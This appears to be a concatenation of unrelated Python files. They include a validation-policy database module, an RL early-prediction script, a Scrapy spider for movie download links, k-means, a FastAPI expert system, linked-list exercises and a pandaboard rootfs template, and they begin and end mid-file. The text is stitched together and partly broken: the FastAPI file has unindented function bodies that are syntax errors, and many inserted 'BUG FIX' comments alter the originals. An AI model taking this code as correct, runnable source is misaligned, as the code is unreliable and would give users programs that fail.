    actual_validations = set(v[0] for v in result.values())
    validation_policies = _get_validation_policies_for_revision(revision_id)
    if not validation_policies:
        return result.values()
    # TODO(fmontei): Raise error for expiresAfter conflicts for duplicate
    # validations across ValidationPolicy documents.
    expected_validations = set()
    for vp in validation_policies:
        expected_validations = expected_validations.union(
            list(v['name'] for v in vp['data'].get('validations', [])))
    missing_validations = expected_validations - actual_validations
    extra_validations = actual_validations - expected_validations
    # If an entry in the ValidationPolicy was never POSTed, set its status
    # to failure.
    for missing_validation in missing_validations:
        result[missing_validation] = (missing_validation, 'failure')
    # If an entry is not in the ValidationPolicy but was externally registered,
    # then override its status to "ignored [{original_status}]".
    for extra_validation in extra_validations:
        result[extra_validation] = (
            extra_validation, 'ignored [%s]' % result[extra_validation][1])
    return result.values()
def _check_validation_entries_against_validation_policies(
        revision_id, entries, val_name=None, session=None):
    """Reconcile DB validation entries with the revision's ValidationPolicy.

    Validations expected by a ValidationPolicy but never registered are
    appended as ``failure`` entries; entries registered but not listed in any
    ValidationPolicy have their status rewritten to
    ``ignored [<original status>]`` with an explanatory error per policy.

    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param entries: Iterable of ``Validation`` model objects.
    :param val_name: Optional validation name used to scope the check.
    :param session: Database session object.
    :returns: List of validation entry dicts with statuses reconciled.
    """
    session = session or get_session()
    result = [e.to_dict() for e in entries]
    # Group the entries by validation name for the extra-validations pass.
    result_map = {}
    for r in result:
        result_map.setdefault(r['name'], [])
        result_map[r['name']].append(r)
    actual_validations = set(v['name'] for v in result)
    validation_policies = _get_validation_policies_for_revision(revision_id)
    if not validation_policies:
        return result
    # TODO(fmontei): Raise error for expiresAfter conflicts for duplicate
    # validations across ValidationPolicy documents.
    expected_validations = set()
    for vp in validation_policies:
        expected_validations |= set(
            v['name'] for v in vp['data'].get('validations', []))
    missing_validations = expected_validations - actual_validations
    extra_validations = actual_validations - expected_validations
    # If an entry in the ValidationPolicy was never POSTed, set its status
    # to failure.
    for missing_name in missing_validations:
        if val_name is None or missing_name == val_name:
            result.append({
                'id': len(result),
                'name': val_name,
                'status': 'failure',
                'errors': [{
                    'message': 'The result for this validation was never '
                               'externally registered so its status defaulted '
                               'to "failure".'
                }]
            })
            break
    # If an entry is not in the ValidationPolicy but was externally registered,
    # then override its status to "ignored [{original_status}]".
    for extra_name in extra_validations:
        for entry in result_map[extra_name]:
            original_status = entry['status']
            entry['status'] = 'ignored [%s]' % original_status
            entry.setdefault('errors', [])
            for vp in validation_policies:
                # BUG FIX: msg_args was previously computed once before this
                # loop using a stale ``vp`` left over from the earlier policy
                # loop, so every error message referenced the wrong policy.
                # Compute it per policy instead.
                msg_args = eng_utils.meta(vp) + (
                    ', '.join(v['name'] for v in vp['data'].get(
                        'validations', [])),
                )
                entry['errors'].append({
                    'message': (
                        'The result for this validation was externally '
                        'registered but has been ignored because it is not '
                        'found in the validations for ValidationPolicy '
                        '[%s, %s] %s: %s.' % msg_args
                    )
                })
    return result
@require_revision_exists
def validation_get_all_entries(revision_id, val_name=None, session=None):
    """Return all validation entries for ``revision_id``.

    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param val_name: Optional validation name used to filter the entries.
    :param session: Database session object.
    :returns: List of validation entry dicts, ordered by creation time and
        reconciled against the revision's ValidationPolicy documents.
    """
    session = session or get_session()
    entries = session.query(models.Validation)\
        .filter_by(revision_id=revision_id)
    if val_name:
        entries = entries.filter_by(name=val_name)
    # BUG FIX: the ordered result list was previously discarded because the
    # return value of ``.order_by(...).all()`` was never assigned, so the
    # unordered Query object was passed downstream instead.
    entries = entries.order_by(models.Validation.created_at.asc())\
        .all()
    return _check_validation_entries_against_validation_policies(
        revision_id, entries, val_name=val_name, session=session)
@require_revision_exists
def validation_get_entry(revision_id, val_name, entry_id, session=None):
    """Return a single validation entry selected by positional ``entry_id``.

    :param revision_id: ID corresponding to ``Revision`` DB object.
    :param val_name: Name of the validation.
    :param entry_id: Index of the desired entry within the entry list.
    :param session: Database session object.
    :returns: Dictionary representation of the requested validation entry.
    :raises ValidationNotFound: If no entry exists at ``entry_id``.
    """
    session = session or get_session()
    all_entries = validation_get_all_entries(
        revision_id, val_name, session=session)
    try:
        return all_entries[entry_id]
    except IndexError:
        raise errors.ValidationNotFound(
            revision_id=revision_id, validation_name=val_name,
            entry_id=entry_id)
|
### Ting-Yao Hu, 2016.0
import sys
import os
from sklearn.svm import SVC, LinearSVC
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from myconfig import *
sys.path.append(util_dir)
sys.path.append(early_predict_dir)
sys.path.append(rl_dir)
from util_ml import *
from rl_feature_extraction import *
from q_learning import *
def distance_func(state1, state2):
    """L1 distance between two states, ignoring the trailing end-flag.

    States whose final elements (end flags) differ are treated as
    infinitely far apart.
    """
    if state1[-1] != state2[-1]:
        return sys.float_info.max
    return sum(abs(state1[i] - state2[i]) for i in range(len(state1) - 1))
# Per-step observation cost for the MDP reward, supplied on the command line.
stepcost = float(sys.argv[1])
#stepcost = 0.1
# Load per-modality feature sequences and labels.
# NOTE(review): Python 2 style — files opened in text mode for pickle, and
# names such as pickle/np/RandomPerm/KFold_withl come from the star imports
# above (util_ml, rl_feature_extraction, q_learning) — confirm.
X_ts = pickle.load(open(feat_dir+'text_seq.pkl'))
X_as = pickle.load(open(feat_dir+'audio_seq.pkl'))
X_vs = pickle.load(open(feat_dir+'video_seq.pkl'))
y = pickle.load(open(feat_dir+'lab.pkl'))
y_dummy = pickle.load(open(feat_dir+'lab.pkl'))
l = pickle.load(open(feat_dir+'length.pkl'))
datanum = X_ts.shape[0]
# Replicate the per-sample length across all 10 time steps as an extra
# feature channel.
ls = np.zeros((datanum,1,10))
for idx in range(10):
    ls[:,0,idx] = l
maxl = 10
# Re-seed before each permutation so every modality receives the identical
# shuffling order (labels are permuted once alongside X_ts).
np.random.seed(1234)
ls, y_dummy = RandomPerm(ls,y_dummy)
np.random.seed(1234)
X_as, y_dummy = RandomPerm(X_as,y_dummy)
np.random.seed(1234)
X_vs, y_dummy = RandomPerm(X_vs,y_dummy)
np.random.seed(1234)
X_ts, y = RandomPerm(X_ts,y)
# Audio features augmented with the length channel.
X_avs = np.concatenate((X_as,ls),axis=1)
ypred_total,ytest_total = [],[]
lcount = 0
# 5-fold cross-validation; each fold trains a Q-learning early-stopping
# policy on top of per-timestep linear classifiers.
for Xtrain, ytrain, ltrain, Xtest, ytest, ltest in KFold_withl(X_avs,y,l,5):
    #clf = LogisticRegression(C=0.01)
    clf = LinearSVC(C=0.01,penalty='l1',dual=False)
    hist = score_hist(Xtrain,ytrain,ltrain,clf)
    historylst = rl_feature(Xtrain,ytrain,ltrain,clf,hist,stepcost)
    mdp = MyMDP(alpha = 0.5, gamma=0.9, iternum = 500)
    mdp.init_from_history(historylst)
    mdp.q_learn(historylst)
    # One classifier per prefix length (time step).
    clflst = []
    for idx in range(maxl):
        #clf = LogisticRegression(C=0.01)
        clf = LinearSVC(C=0.01,penalty='l1',dual=False)
        clf.fit(Xtrain[:,:,idx],ytrain)
        clflst.append(clf)
    tsdatanum = Xtest.shape[0]
    ypred = []
    #classes =
    for idx in range(tsdatanum):
        X_sample = Xtest[idx,:,:]
        test_state_lst = rl_feature_test(X_sample,clflst,ltest[idx],hist)
        #print test_state_lst
        # Walk the state sequence; commit to a prediction when the learned
        # policy says stop ('y'), the sequence ends, or 5 steps have passed.
        for jdx, state in enumerate(test_state_lst):
            endbool = state[-1]
            if mdp.policy(state,distance_func=distance_func)=='y' or endbool or jdx==4:
                ypred.append(state[0])
                lcount+=jdx+1
                print jdx+1
                break
    print accuracy_score(ypred,ytest)
    ypred_total+=ypred
    ytest_total+=ytest.tolist()
# Total observed segments and overall accuracy across folds.
print lcount
print accuracy_score(ytest_total,ypred_total)
|
# -*- coding: utf-8 -*-
import scrapy
from hao6v.items import Hao6VItem
class Haov6Spider(scrapy.Spider):
    """Spider for hao6v.com movie listings.

    Crawls the paginated movie index, follows every movie's detail page
    and yields items with title, poster image and download URL.
    """
    name = 'haov6'
    allowed_domains = ['hao6v.com']
    start_urls = ['http://www.hao6v.com/dy/index.html']

    def parse(self, response):
        # BUG FIX: re-requesting response.url was silently dropped by
        # scrapy's duplicate filter (the URL was just fetched), so the
        # first index page was never parsed; dont_filter=True lets the
        # request through.
        yield scrapy.Request(response.url, callback=self.parse_first,
                             dont_filter=True)
        for page in range(2, 265):
            link = 'http://www.hao6v.com/dy/index_{}.html'.format(page)
            yield scrapy.Request(link, callback=self.parse_first)

    def parse_first(self, response):
        """Collect the detail-page URL of every movie on an index page."""
        items = []
        news = response.xpath('//*[@id="main"]/div[1]/div/ul/li')
        for new in news:
            item = Hao6VItem()
            item['url'] = new.xpath('./a/@href').extract_first()
            items.append(item)
        for item in items:
            yield scrapy.Request(url=item['url'], callback=self.parse_second)

    def parse_second(self, response):
        """Scrape title, poster and download link from a detail page."""
        item = Hao6VItem()
        item['title'] = response.xpath('//*[@id="main"]/div[1]/div/h1/text()').extract_first()
        item['img'] = response.xpath('//*[@id="endText"]/p[1]/img/@src').extract_first()
        item['downurl'] = response.xpath('//*[@id="endText"]/table/tbody/tr[2]/td/a/@href').extract_first()
        print(item['downurl'])
        # Only yield items that actually carry a download link.
        if item['downurl'] is not None:
            yield item
"""
A Python Program thet performs K-Means Clustering, where
the user must specify the number of clusters or k that they desire.
"""
import sys
import random
# Data file: one whitespace-separated feature row per line.
datafile = sys.argv[1]
f = open(datafile)
data = []
i = 0
l = f.readline()
#Read Data
while (l != ''):
    a = l.split()
    l2 = []
    for j in range(0, len(a), 1):
        l2.append(float(a[j]))
    data.append(l2)
    l = f.readline()
rows = len(data)
cols = len(data[0])
f.close()
# Number of clusters requested on the command line.
k = int(sys.argv[2])
"""
#Read labels
labelfile = sys.argv[2]
f = open(labelfile)
trainlabels = {}
n = [0,0]
l = f.readline()
while(l != ''):
    a = l.split()
    trainlabels[int(a[1])] = int(a[0])
    l = f.readline()
    n[int(a[0])] += 1
"""
###create a dictionary to store the cluster that each datapoint joins###
keys = []
for i in range (0,k,1):
    keys.append(i)
#cluster = {key: [] for key in keys}
#print(cluster)
###pick k random points to begin the clustering; do this outside the loop###
cluster_list = random.sample(data,k)
print("first cluster list: ",cluster_list)
#print(len(cluster_list))
min_dist_index = 0
converged = False
count = 0
old_cluster_list = []
# Lloyd's algorithm: assign points to nearest centroid, recompute centroids,
# stop when centroids no longer move or after 500 rounds.
while (converged == False and count < 500):
    count += 1
    cluster = {key: [] for key in keys}
    # old_cluster_list = cluster_list
    print("cluster list for round ", count,": ",cluster_list)
    for i in range(0,rows,1):
        #for each row of data, calculate the euclidean distance between it and each datapoint in the cluster_list###
        euclid_distances = [0]*k
        for h in range (0,len(cluster_list), 1):
            for j in range(0,cols,1):
                euclid_distances[h] += (data[i][j] - cluster_list[h][j])**2
            euclid_distances[h] = euclid_distances[h]**0.5
        # Assign the row index to its nearest centroid's bucket.
        min_dist_index = euclid_distances.index(min(euclid_distances))
        cluster[min_dist_index].append(i)
    #print("cluster: ", cluster)
    index = -1
    cluster_list = [0]*k
    # Recompute each centroid as the mean of its assigned rows.
    # NOTE(review): an empty cluster (size == 0) would divide by zero when
    # any accumulated coordinate is non-zero — confirm this cannot happen.
    for value in cluster.values():
        index += 1
        m = [0]*cols
        size = len(value)
        for i in range (0,size, 1):
            for j in range(0,cols,1):
                m[j] += data[int(value[i])][j]
        for j in range (0,cols,1):
            if (m[j] != 0):
                m[j] = m[j]/size
            else:
                continue
        cluster_list[index] = m
    # print("clusters after this iteration: ", cluster_list)
    if (old_cluster_list != [] and cluster_list == old_cluster_list):
        converged = True
        print("converged")
    else:
        old_cluster_list = cluster_list
        continue
# Print the final (cluster-index, row-index) assignment for every row.
for i in range (0,rows,1):
    index = -1
    for value in cluster.values():
        index += 1
        size = len(value)
        for j in range(0,size,1):
            if (i == value[j]):
                print(index, value[j])
|
# Advent of Code day 10 part 1: count joltage gaps of 1 and 3 between
# consecutively sorted adapters and print their product.
with open('input.txt') as handle:
    adapters = sorted(int(line) for line in handle.read().splitlines())
# The device's built-in adapter is always 3 jolts above the highest one.
adapters.append(adapters[-1] + 3)
differences = {1: 0, 2: 0, 3: 0}
prev = 0  # the charging outlet starts at 0 jolts
for rating in adapters:
    differences[rating - prev] += 1
    prev = rating
print(differences[1] * differences[3])
from typing import Optional
import uvicorn
from fastapi import FastAPI
from pydantic import BaseModel
from starlette.staticfiles import StaticFiles
import db
BASE_PATH = "/api"
app = FastAPI()
app.mount("/static", StaticFiles(directory="static"), name="static")
@app.get(BASE_PATH)
async def root():
return {"message": "Hello World"}
# ---------- knowledge ----------
# 知识对象
class Knowledge(BaseModel):
    """Request/response model for a knowledge (t_code) record."""
    code: Optional[int] = None
    name: Optional[str] = None
    type: Optional[int] = None
# 添加综合数据库
@app.post(BASE_PATH + "/knowledge/save")
async def knowledge_add(knowledge: Knowledge):
    """Insert a new knowledge record; names must be unique."""
    conn = db.conn()
    # Reject duplicates: nothing to add if the name is already present.
    result = db.select(conn, "select * from t_code where name = ?", (knowledge.name,))
    if result is not None:
        # BUG FIX: close the connection on the early-return path too
        # (it was previously leaked whenever the name already existed).
        db.close(conn)
        return {"code": "-1", "message": "the name is already exist, please change a new one"}
    db.execute(conn, "insert into t_code(name, type) values (?, ?)", (knowledge.name, knowledge.type))
    db.close(conn)
    return {"code": "0", "message": "success"}
# 单条查询综合数据库
@app.post(BASE_PATH + "/knowledge/select")
async def knowledge_select(knowledge: Knowledge):
    """Fetch a single knowledge record by its code."""
    conn = db.conn()
    result = db.select(conn, "select * from t_code where code = ?", (knowledge.code,))
    if result is None:
        # BUG FIX: close the connection on the not-found path too
        # (it was previously leaked).
        db.close(conn)
        return {"code": "-1", "message": "record is not exist"}
    db.close(conn)
    return {"code": "0", "message": "success", "data": {"code": result[0], "name": result[1], "type": result[2]}}
# 更新综合数据库
@app.post(BASE_PATH + "/knowledge/update")
async def knowledge_update(knowledge: Knowledge):
    """Update a knowledge record; the new name must stay unique."""
    conn = db.conn()
    # Make sure the record being edited exists.
    result = db.select(conn, "select code from t_code where code = ?", (knowledge.code,))
    if result is None:
        # BUG FIX: close the connection on every early-return path
        # (both were previously leaked).
        db.close(conn)
        return {"code": "-1", "message": "record is not exist"}
    # A different record already owning the new name is a conflict.
    temp = db.select(conn, "select code from t_code where name = ?", (knowledge.name,))
    if temp is not None and result[0] != temp[0]:
        db.close(conn)
        return {"code": "-1", "message": "the name is already exist, pls change a new one"}
    db.execute(conn, "update t_code set name = ?, type = ? where code = ? ",
               (knowledge.name, knowledge.type, knowledge.code))
    db.close(conn)
    return {"code": "0", "message": "success"}
# 删除综合数据库
@app.post(BASE_PATH + "/knowledge/delete")
async def knowledge_delete(knowledge: Knowledge):
    """Delete a knowledge record by its code."""
    conn = db.conn()
    # Make sure the record exists before deleting.
    result = db.select(conn, "select * from t_code where code = ?", (knowledge.code,))
    if result is None:
        # BUG FIX: close the connection on the not-found path too
        # (it was previously leaked).
        db.close(conn)
        return {"code": "-1", "message": "record is not exist"}
    db.execute(conn, "delete from t_code where code = ?", (knowledge.code,))
    db.close(conn)
    return {"code": "0", "message": "success"}
# 查询全部的综合数据库列表
@app.post(BASE_PATH + "/knowledge/all")
async def knowledge_all(knowledge: Knowledge):
    """List knowledge records, optionally filtered by name (fuzzy) and type."""
    conn = db.conn()
    # Build the WHERE clause dynamically from whichever filters were sent.
    sql = "select * from t_code where 1=1 "
    params = []
    if knowledge.name is not None:
        sql += " and name like ? "
        params.append("%" + knowledge.name + "%")
    if knowledge.type is not None:
        sql += " and type = ? "
        params.append(knowledge.type)
    result = db.many(conn, sql, tuple(params))
    rows = []
    if result is not None:
        rows = [{"code": row[0], "name": row[1], "type": row[2]}
                for row in result]
    db.close(conn)
    return {"code": "0", "message": "success", "data": rows}
# ---------- rule ----------
# 规则对象
class Rule(BaseModel):
    """Request/response model for an inference rule (t_rule) record."""
    code: Optional[int] = None
    name: Optional[str] = None
    # Evaluation order: rules are fetched "order by position".
    position: Optional[int] = None
    # type == 1 marks a terminal rule whose conclusion is a final answer.
    type: Optional[int] = None
    # Rule text in the form "cond1+cond2+...=conclusion".
    rule: Optional[str] = None
# 添加规则对象
@app.post(BASE_PATH + "/rule/save")
async def rule_add(rule: Rule):
    """Insert a new rule record; names must be unique."""
    conn = db.conn()
    # Reject duplicates: nothing to add if the name is already present.
    result = db.select(conn, "select * from t_rule where name = ?", (rule.name,))
    if result is not None:
        # BUG FIX: close the connection on the early-return path too
        # (it was previously leaked).
        db.close(conn)
        return {"code": "-1", "message": "the name is already exist, please change a new one"}
    db.execute(conn, "insert into t_rule(name, position, type, rule) values (?, ?, ?, ?)",
               (rule.name, rule.position, rule.type, rule.rule))
    db.close(conn)
    return {"code": "0", "message": "success"}
# 单条查询规则对象
@app.post(BASE_PATH + "/rule/select")
async def rule_select(rule: Rule):
    """Fetch a single rule record by its code."""
    conn = db.conn()
    result = db.select(conn, "select * from t_rule where code = ?", (rule.code,))
    if result is None:
        # BUG FIX: close the connection on the not-found path too
        # (it was previously leaked).
        db.close(conn)
        return {"code": "-1", "message": "record is not exist"}
    db.close(conn)
    return {"code": "0", "message": "success",
            "data": {"code": result[0], "name": result[1], "position": result[2], "type": result[3], "rule": result[4]}}
# 更新规则对象
@app.post(BASE_PATH + "/rule/update")
async def rule_update(rule: Rule):
    """Update a rule record; the new name must stay unique."""
    conn = db.conn()
    # Make sure the record being edited exists.
    result = db.select(conn, "select code from t_rule where code = ?", (rule.code,))
    if result is None:
        # BUG FIX: close the connection on every early-return path
        # (both were previously leaked).
        db.close(conn)
        return {"code": "-1", "message": "record is not exist"}
    # A different record already owning the new name is a conflict.
    temp = db.select(conn, "select code from t_rule where name = ?", (rule.name,))
    if temp is not None and result[0] != temp[0]:
        db.close(conn)
        return {"code": "-1", "message": "the name is already exist, pls change a new one"}
    db.execute(conn, "update t_rule set name = ?, position = ?, type = ?, rule = ? where code = ? ",
               (rule.name, rule.position, rule.type, rule.rule, rule.code))
    db.close(conn)
    return {"code": "0", "message": "success"}
# 删除规则对象
@app.post(BASE_PATH + "/rule/delete")
async def rule_delete(rule: Rule):
    """Delete a rule record by its code."""
    conn = db.conn()
    # Make sure the record exists before deleting.
    result = db.select(conn, "select * from t_rule where code = ?", (rule.code,))
    if result is None:
        # BUG FIX: close the connection on the not-found path too
        # (it was previously leaked).
        db.close(conn)
        return {"code": "-1", "message": "record is not exist"}
    db.execute(conn, "delete from t_rule where code = ?", (rule.code,))
    db.close(conn)
    return {"code": "0", "message": "success"}
# 查询全部的综合数据库列表
@app.post(BASE_PATH + "/rule/all")
async def rule_all(rule: Rule):
    """List rule records (ordered by position), optionally filtered."""
    conn = db.conn()
    # Build the WHERE clause dynamically from whichever filters were sent.
    sql = "select * from t_rule where 1=1 "
    params = []
    if rule.name is not None:
        sql += " and name like ? "
        params.append("%" + rule.name + "%")
    if rule.type is not None:
        sql += " and type = ? "
        params.append(rule.type)
    sql += " order by position"
    result = db.many(conn, sql, tuple(params))
    rows = []
    if result is not None:
        rows = [{"code": row[0], "name": row[1], "position": row[2],
                 "type": row[3], "rule": row[4]} for row in result]
    db.close(conn)
    return {"code": "0", "message": "success", "data": rows}
# ---------- process ----------
# 规则对象
class SubmitRule(BaseModel):
    """Request model carrying a '+'-joined string of input fact codes."""
    rule: str
# 推理机开发
@app.post(BASE_PATH + "/process")
async def process(rule: Rule):
    """Run the forward-chaining inference engine on '+'-joined input codes.

    Keeps firing rules (via match) until no intermediate rule applies;
    returns the matched animal when a terminal rule fired, otherwise a
    "no match" placeholder.
    """
    # BUG FIX: rule.rule defaults to None, which crashed .split(); the old
    # check `len(inputs) == 0` was dead code because str.split never
    # returns an empty list. Guard the raw value instead.
    if not rule.rule:
        return {"code": "-1", "message": "rule is not correct"}
    inputs = rule.rule.split("+")
    rules = get_rules()
    # Python has no do..while; assume the first pass matches (flag == 1).
    flag = 1
    while flag == 1:
        flag = match(rules, inputs)
    if flag == 2:
        data = select_knowledge(inputs[-1])
    else:
        data = {"code": -1, "name": "无匹配动物", "type": -1}
    return {"code": "0", "message": "success", "data": data}
# 进行匹配
def match(rules, inputs):
    """Apply every firing production rule to ``inputs`` in place.

    Returns 0 when no rule fired, 1 when an intermediate rule fired,
    2 when a terminal rule (type == 1) fired.
    """
    # 0: no match, 1: matched an intermediate result, 2: matched the final result
    flag = 0
    for rule in rules:
        parts = rule["rule"].split("=")
        lhs = parts[0]
        rhs = parts[1]
        conditions = lhs.split("+")
        # Record the position of every input that equals some condition;
        # the rule fires only when the hit count equals the condition count.
        hits = [j for cond in conditions
                for j, value in enumerate(inputs) if value == cond]
        if len(hits) == len(conditions):
            flag = 1
            # Remove matched inputs from the highest index down so the
            # remaining positions stay valid.
            for position in sorted(hits, reverse=True):
                inputs.pop(position)
            # Then add the rule's conclusion (once).
            if rhs not in inputs:
                inputs.append(rhs)
            # A terminal rule means we reached the final answer.
            if rule["type"] == 1:
                flag = 2
    return flag
# 得到所有的规则
def get_rules():
    """Fetch every rule record, ordered by its position column."""
    conn = db.conn()
    result = db.many(conn, "select * from t_rule order by position", ())
    rows = []
    if result is not None:
        rows = [{"code": r[0], "name": r[1], "position": r[2],
                 "type": r[3], "rule": r[4]} for r in result]
    db.close(conn)
    return rows
# 单条查询规则对象
def select_knowledge(code):
    """Look up a single knowledge record by code.

    Returns the record as a dict, or an error dict when it is missing.
    """
    conn = db.conn()
    result = db.select(conn, "select * from t_code where code = ?", (code,))
    if result is None:
        # BUG FIX: close the connection on the not-found path too
        # (it was previously leaked).
        db.close(conn)
        return {"code": "-1", "message": "record is not exist"}
    db.close(conn)
    return {"code": result[0], "name": result[1], "type": result[2]}
# 单元测试
def test():
    """Manual smoke test for the inference engine (run without the API)."""
    _inputs = "1+9+12".split("+")
    # _inputs = "4+19".split("+")
    _rules = get_rules()
    # Python has no do..while; assume the first pass matches (flag == 1).
    _flag = 1
    while _flag == 1:
        print("inputs is: " + str(_inputs))
        _flag = match(_rules, _inputs)
    if _flag == 2:
        data = select_knowledge(_inputs[-1])
    else:
        data = {"code": -1, "name": "无匹配动物", "type": -1}
    print(data)
if __name__ == "__main__":
# test()
# 如果需要本地调试,可以通过启用uvicorn方便进行调试
uvicorn.run(app, host="0.0.0.0", port=8000)
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Load the Position_Salaries dataset: column 1 = position level (X),
# column 2 = salary (y).
dataset= pd.read_csv('Position_Salaries.csv')
x=dataset.iloc[:,1:2].values
y=dataset.iloc[:,2].values
#fitting decision tree regression model to dataset
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(random_state=0)
regressor.fit(x,y)
#predicting the salary for position level 6.5
y_pred = regressor.predict([[6.5]])
#visualizing the decision tree regression results
plt.scatter(x,y,color='red')
plt.plot(x, regressor.predict(x), color='blue')
plt.title('Decision Tree Regression Model')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show()
#visualizing the decision tree regression results (for higher resolution)
# A 0.01-step grid reveals the piecewise-constant shape of the tree.
x_grid=np.arange(min(x), max(x), 0.01)
x_grid= x_grid.reshape((len(x_grid),1))
plt.scatter(x,y,color='red')
plt.plot(x_grid,regressor.predict(x_grid), color='blue')
plt.title('Decision Tree Reg')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show()
# from nose.tools import assert_equal
class SingleLinkedList:
    """Node of a singly linked list: a value plus a next-pointer."""

    def __init__(self, val):
        self.next = None
        self.value = val
class DoubleLinkedList:
    """Node of a doubly linked list: value plus next/previous pointers."""

    def __init__(self, value):
        self.value = value
        self.previous = None
        self.next = None
def cyclic_check(node):
    """Return True when the list starting at ``node`` contains a cycle.

    BUG FIX: the original tracked *values*, so two distinct nodes holding
    equal values were misreported as a cycle. Track node identity instead
    (and use a set: O(1) membership instead of a list's O(n)). The debug
    prints were removed.
    """
    seen = set()
    while node.next is not None:
        if id(node) in seen:
            return True
        seen.add(id(node))
        node = node.next
    return False
# My Solution -
def reverse_singleLinkList(first_node):
    """Reverse a singly linked list and return the new head.

    BUG FIX: the original never cleared the old head's ``next`` pointer,
    so after reversal the last two nodes pointed at each other, leaving a
    cycle. The debug prints were removed, and an empty list (None head)
    is now handled.
    """
    if first_node is None:
        return None
    # Collect the nodes in original order.
    nodes = []
    node = first_node
    while node is not None:
        nodes.append(node)
        node = node.next
    # Re-link each node to its predecessor; the old head becomes the tail.
    for pos in range(len(nodes) - 1, 0, -1):
        nodes[pos].next = nodes[pos - 1]
    nodes[0].next = None
    return nodes[-1]
def jose_reverse_ll(head):
    """Reverse a singly linked list iteratively; return the new head.

    Classic three-pointer walk: each node's ``next`` is redirected to the
    node before it. Returns None for an empty list.
    """
    prev = None
    curr = head
    while curr is not None:
        # Rewire, then step forward (RHS is evaluated before assignment).
        curr.next, prev, curr = prev, curr, curr.next
    return prev
def nth_node_from_last(nth, tail_node):
    """Return the nth node from the end of the list headed by ``tail_node``.

    BUG FIX: the original body was left unfinished (a dangling
    ``current_node =`` assignment, a SyntaxError) and used Python 2's
    ``xrange``. Implemented with the classic two-pointer walk: advance a
    lead pointer ``nth`` steps, then move lead and trail together until
    the lead falls off the end. Returns None when the list is shorter
    than ``nth``.
    """
    lead = tail_node
    for _ in range(nth):
        if lead is None:
            return None
        lead = lead.next
    trail = tail_node
    while lead is not None:
        lead = lead.next
        trail = trail.next
    return trail
if __name__ == '__main__':
    # Single linked list: a -> b -> c
    a = SingleLinkedList(10)
    b = SingleLinkedList(20)
    c = SingleLinkedList(30)
    a.next = b
    b.next = c
    # Double linked list: x <-> y <-> z
    x = DoubleLinkedList(100)
    y = DoubleLinkedList(200)
    z = DoubleLinkedList(300)
    x.next = y
    y.previous = x
    y.next = z
    z.previous = y
    # Cyclic check. sl4 is isolated (no next), so this prints False;
    # uncommenting sl3.next = sl1 and checking sl1 would create a cycle.
    sl1 = SingleLinkedList(10)
    sl2 = SingleLinkedList(20)
    sl3 = SingleLinkedList(30)
    sl4 = SingleLinkedList(40)
    sl1.next = sl2
    sl2.next = sl3
    # sl3.next = sl1
    print(cyclic_check(sl4))
|
class Solution:
    def subsets(self, nums: "List[int]") -> "List[List[int]]":
        """Return all subsets (the power set) of ``nums``.

        Emits all 1-element combinations first, then 2-element, ..., and
        finally the empty subset — preserving the original output order.

        BUG FIX: the ``List`` annotations are now strings so the class can
        be defined outside the LeetCode harness, where ``typing.List`` is
        not pre-imported (unquoted annotations are evaluated at def time).
        """
        from itertools import combinations
        ans = []
        for size in range(1, len(nums) + 1):
            ans.extend(list(combo) for combo in combinations(nums, size))
        ans.append([])
        return ans
|
#MKU, template based rootfs builder for Ubuntu.
#This file is the template for the pandaboard board.
#Copyright (C) 2013 Angelo Compagnucci <angelo.compagnucci@gmail.com>
#Copyright (C) 2013 Daniele Accattoli <d.acca87@gmail.com>
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# NOTE: the kernel in this repository doesn't have the driver for USB EHCI
# Boot script
# u-boot boot script: load the kernel from the first FAT partition and
# boot with the rootfs on mmcblk0p2, console on serial port ttyO2.
BOOTCMD="""fatload mmc 0:1 0x80000000 uImage
setenv bootargs rw vram=32M fixrtc mem=1G@0x80000000 root=/dev/mmcblk0p2 console=ttyO2,115200n8 rootwait
bootm 0x80000000
"""
# Shell snippet that parses console= from /proc/cmdline and spawns a
# getty on the serial port it names (installed as /bin/serial-console).
SERIAL_CONSOLE_SCRIPT="""for arg in $(cat /proc/cmdline)
do
case $arg in
console=*)
tty=${arg#console=}
tty=${tty#/dev/}
case $tty in
tty[a-zA-Z]* )
PORT=${tty%%,*}
# check for service which do something on this port
if [ -f /etc/init/$PORT.conf ];then continue;fi
tmp=${tty##$PORT,}
SPEED=${tmp%%n*}
BITS=${tmp##${SPEED}n}
# 8bit serial is default
[ -z $BITS ] && BITS=8
[ 8 -eq $BITS ] && GETTY_ARGS="$GETTY_ARGS -8 "
[ -z $SPEED ] && SPEED='115200,57600,38400,19200,9600'
GETTY_ARGS="$GETTY_ARGS $SPEED $PORT"
exec /sbin/getty $GETTY_ARGS
esac
esac
done
"""
# Upstart job providing a login console on the board's serial port.
CONSOLE="""
start on runlevel [23]
stop on runlevel [!23]
respawn
exec /sbin/getty 115200 ttyO2
"""
#exec /bin/sh /bin/serial-console
# Per-release download locations for MLO, u-boot and the installer kernel.
PRECISE_MLO_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/precise/main/installer-armhf/current/images/omap4/netboot/MLO"
QUANTAL_MLO_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/quantal/main/installer-armhf/current/images/omap4/netboot/MLO"
PRECISE_UBOOT_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/precise/main/installer-armhf/current/images/omap4/netboot/u-boot.bin"
QUANTAL_UBOOT_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/quantal/main/installer-armhf/current/images/omap4/netboot/u-boot.bin"
PRECISE_KERNEL_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/precise/main/installer-armhf/current/images/omap4/netboot/uImage"
QUANTAL_KERNEL_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/quantal/main/installer-armhf/current/images/omap4/netboot/uImage"
import subprocess
import os
def board_prepare():
